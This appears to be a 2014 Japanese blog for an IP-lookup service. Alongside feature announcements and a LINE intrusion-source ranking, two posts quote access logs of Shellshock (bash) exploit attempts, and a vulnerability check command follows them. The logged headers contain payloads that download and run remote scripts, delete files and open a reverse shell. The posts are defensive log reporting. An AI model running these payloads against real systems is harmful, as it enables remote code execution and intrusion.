adsense

2014年11月5日水曜日

IPアドレスの場所がデータベースに存在しない場合の表示について

よくお問い合わせいただく内容で、IPアドレスの場所が下記の様にアフリカの海上に位置しているケースがあります。
こちらにつきましては、IPアドレスの場所がデータベースに存在しない場合の結果となりますので、ご了承ください。






2014年10月5日日曜日

bashの脆弱性を狙ったリクエスト (その2)

現在もbashの脆弱性を狙ったリクエストが継続しています。
下記の通り、bashの引数に色々なコマンドが付与されたリクエストがきており、単なる調査目的のものから、踏み台にして他のサイトに対して不正アクセスを試みるものまで様々見受けられます。

217.72.242.16 - - [29/Sep/2014:00:08:28 +0000] "GET /test/ HTTP/1.0" 403 287 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
173.45.100.18 - - [29/Sep/2014:03:31:29 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
8.37.217.198 - - [29/Sep/2014:18:06:22 +0000] "GET /result.php HTTP/1.1" 200 21422 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [29/Sep/2014:23:03:12 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
62.210.75.170 - - [30/Sep/2014:06:09:40 +0000] "GET / HTTP/1.1" 200 25839 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
62.210.75.170 - - [30/Sep/2014:06:09:41 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 305 "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget http://creditstat.ru/aXB1dGlsaXRpZXMubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null"
142.4.215.115 - - [01/Oct/2014:08:20:56 +0000] "GET /cgi-bin/hi HTTP/1.0" 404 288 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
8.37.217.196 - - [01/Oct/2014:21:08:43 +0000] "GET /blacklist.html HTTP/1.1" 200 22457 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.199 - - [01/Oct/2014:21:08:43 +0000] "GET /widgets.html HTTP/1.1" 200 5297 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.198 - - [01/Oct/2014:21:08:44 +0000] "GET /tagsearch.html HTTP/1.1" 200 20663 "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
174.143.168.121 - - [02/Oct/2014:01:48:59 +0000] "GET //cgi-bin/bash HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\""
50.193.119.109 - - [02/Oct/2014:17:39:18 +0000] "GET / HTTP/1.0" 200 25889 "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; };echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;"
211.154.173.239 - - [03/Oct/2014:17:07:30 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 305 "-" "() { :;}; /bin/bash -c \"

アクセス元のIPアドレスを調べると、アクセスが多い順で、

1. アメリカ
2. フランス
3. 中国
4. イギリス
5. カナダ
6. オランダ

となっていました。

下記のコマンドをコンソール上で実行することにより、脆弱性があるか確認できますので、必要に応じて対策を実施しましょう。

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

“echo vulnerable“ の部分が勝手に実行されてしまうコマンド部分

– 脆弱性がある場合の表示
• vulnerable
• this is a test

– 脆弱性がない場合の表示
• bash: warning: x: ignoring function definition attempt
• bash: error importing function definition for `x'
• this is a test



2014年9月27日土曜日

bashの脆弱性(Shellshock)を狙ったリクエスト

bashの脆弱性 (shellshock)のニュースが世間を騒がせていますが、直近の当サイトへのアクセスログを確認したところ、こんなアクセスを観測しました。

x.x.x.x - - [25/Sep/2014:06:25:51 +0000] "GET / HTTP/1.0" 200 26104 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
x.x.x.x - - [26/Sep/2014:12:56:07 +0000] "GET / HTTP/1.0" 200 25833 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/x.x.x.x/3333 0>&1'"
x.x.x.x- - [25/Sep/2014:11:55:03 +0000] "GET / HTTP/1.1" 200 26087 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
x.x.x.x - - [25/Sep/2014:13:58:01 +0000] "GET / HTTP/1.1" 200 26076 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"

やはりスキャンが横行しているようですね。アクセス元は中国やアメリカでした。

スキャン元のソースIPアドレスを"shellshock"のタグ名でいくつか登録しておきました。
登録タグの検索ページから確認してみてください。
http://www.iputilities.net/tagsearch.html

もし同様のスキャンを見つけた方は、"shellshock"タグで登録頂けると幸いです。


参考:
GNU bash の脆弱性に関する注意喚起
https://www.jpcert.or.jp/at/2014/at140037.html

警視庁 Bash の脆弱性を標的としたアクセスの観測について
http://www.npa.go.jp/cyberpolice/detect/pdf/20140925-2.pdf




2014年9月14日日曜日

LINEの不正アクセス元の国別ランキング

LINE不正アクセスが 話題になることが多いですが、LINE関連の登録タグから、不正アクセス元のIPアドレスの国別ランキングを出してみました。


1位 ベネズエラ
2位 日本
3位 台湾
4位 タイ
5位 韓国



あくまで元データはタグ付けして頂いたIPアドレスの情報となりますので、実態とは異なるかもしれませんが、ベネズエラが圧倒的に多い結果でした。特定のISPのIPアドレスに集中しています。本データは2014年8月-9月の2ヶ月間のデータを元にしております。

2014年9月13日土曜日

タグの検索結果をエクスポートする機能を追加

タグの検索結果をエクスポートする機能を追加しました。

使い方:
  1. 登録タグの検索画面 http://www.iputilities.net/tagsearch.html へアクセス
  2. 検索キーワードを入力し、検索ボタンをクリック( 例: SPAM)
  3. 検索結果の画面に表示される"Export the result to CSV"のリンクをクリック

"SPAM"の文字列が含まれるタグや"Line"の文字列を含むタグのIPアドレス情報と緯度・経度の情報がCSV形式でダウンロード可能です。





2014年9月8日月曜日

LINEやGmail等のセキュリティアラート

Yahooニュースの個人記事でwww.iputilities.netを扱って頂いてました。
http://bylines.news.yahoo.co.jp/kandatoshiaki/20140907-00038891/

LINEやGmailなどでは、セキュリティアラートにIPアドレス情報が提供されるので、その調査に利用される機会が増えています。また、楽天等のECサイトでもログイン時の履歴にIPアドレスが記録されており、アクセス元の確認に利用できます。

 楽天のログイン履歴の見方:
http://ichiba.faq.rakuten.co.jp/app/answers/detail/a_id/9376 

Google 不審なアクティビティのアラート:
https://support.google.com/accounts/answer/1144110?hl=ja





2014年9月4日木曜日

エクスポート機能追加

タグ付けしたIPアドレスのデータをCSVでダウンロードできるようにしました。
サインインした状態で画面右上のExportのリンクをクリックすると、これまで登録したデータがCSVでダウンロード可能です。(ダウンロードできるのはサインインした状態でご自身が登録したデータのみとなります。)

2014年1月6日月曜日

誠 Biz.ID でご紹介頂きました

「IPアドレスやホスト名からユーザー情報を調べる5つのサービス」のトップに記載頂きました。
http://bizmakoto.jp/bizid/articles/1401/06/news006.html